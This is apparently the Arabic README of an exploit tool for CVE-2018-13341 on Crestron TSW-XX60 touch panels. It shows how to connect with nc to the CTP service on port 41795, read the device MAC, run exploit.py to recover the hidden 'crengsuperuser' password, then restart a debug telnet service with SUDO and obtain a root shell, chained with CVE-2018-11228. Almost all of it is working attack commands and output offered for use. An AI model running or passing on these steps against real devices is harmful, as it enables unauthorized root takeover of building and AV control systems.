
تهدف هذه الأداة إلى استغلال CVE-2018-13341
تهدف هذه الأداة إلى استغلال الثغرة CVE-2018-13341، وذلك باستخدام عنوان MAC للجهاز المستهدف، يمكنك استعادة كلمة مرور الحساب المخفي "crengsuperuser" الذي يتمتع بصلاحيات مرتفعة ويسمح لك بتنفيذ أوامر SUDO (الجذر).
يمكن الاتصال ببروتوكول Crestron Toolbox Protocol (CTP) عبر المنفذ 41795 على جهاز TSW-XX60.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
تتطلب هذه الأداة وحدة CryptoGraphy.
# pip3 install cryptography
أو
# pip3 install -r requirements.txt
usage: exploit.py [-h] [-m MAC]
# مثال
# python3 exploit.py -m aabbccddeeff
[*] عنوان MAC للجهاز: AAXXYYZZ
[*] كلمة مرور 'crengsuperuser': somerandompass
تسمح الثغرة CVE-2018-11228 بتنفيذ أوامر عن بعد غير موثّق عبر خدمة Bash Shell في بروتوكول Crestron Terminal Protocol (CTP). بعد الحصول على كلمة مرور الحساب المخفي "crengsuperuser" يمكنك الوصول إلى صلاحيات root على الجهاز.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
ثم، في نافذة طرفية جديدة، يمكنك الوصول إلى صلاحيات root على الجهاز.
# telnet w.x.y.z
bash# whoami
root
يرجع الفضل إلى: axcheron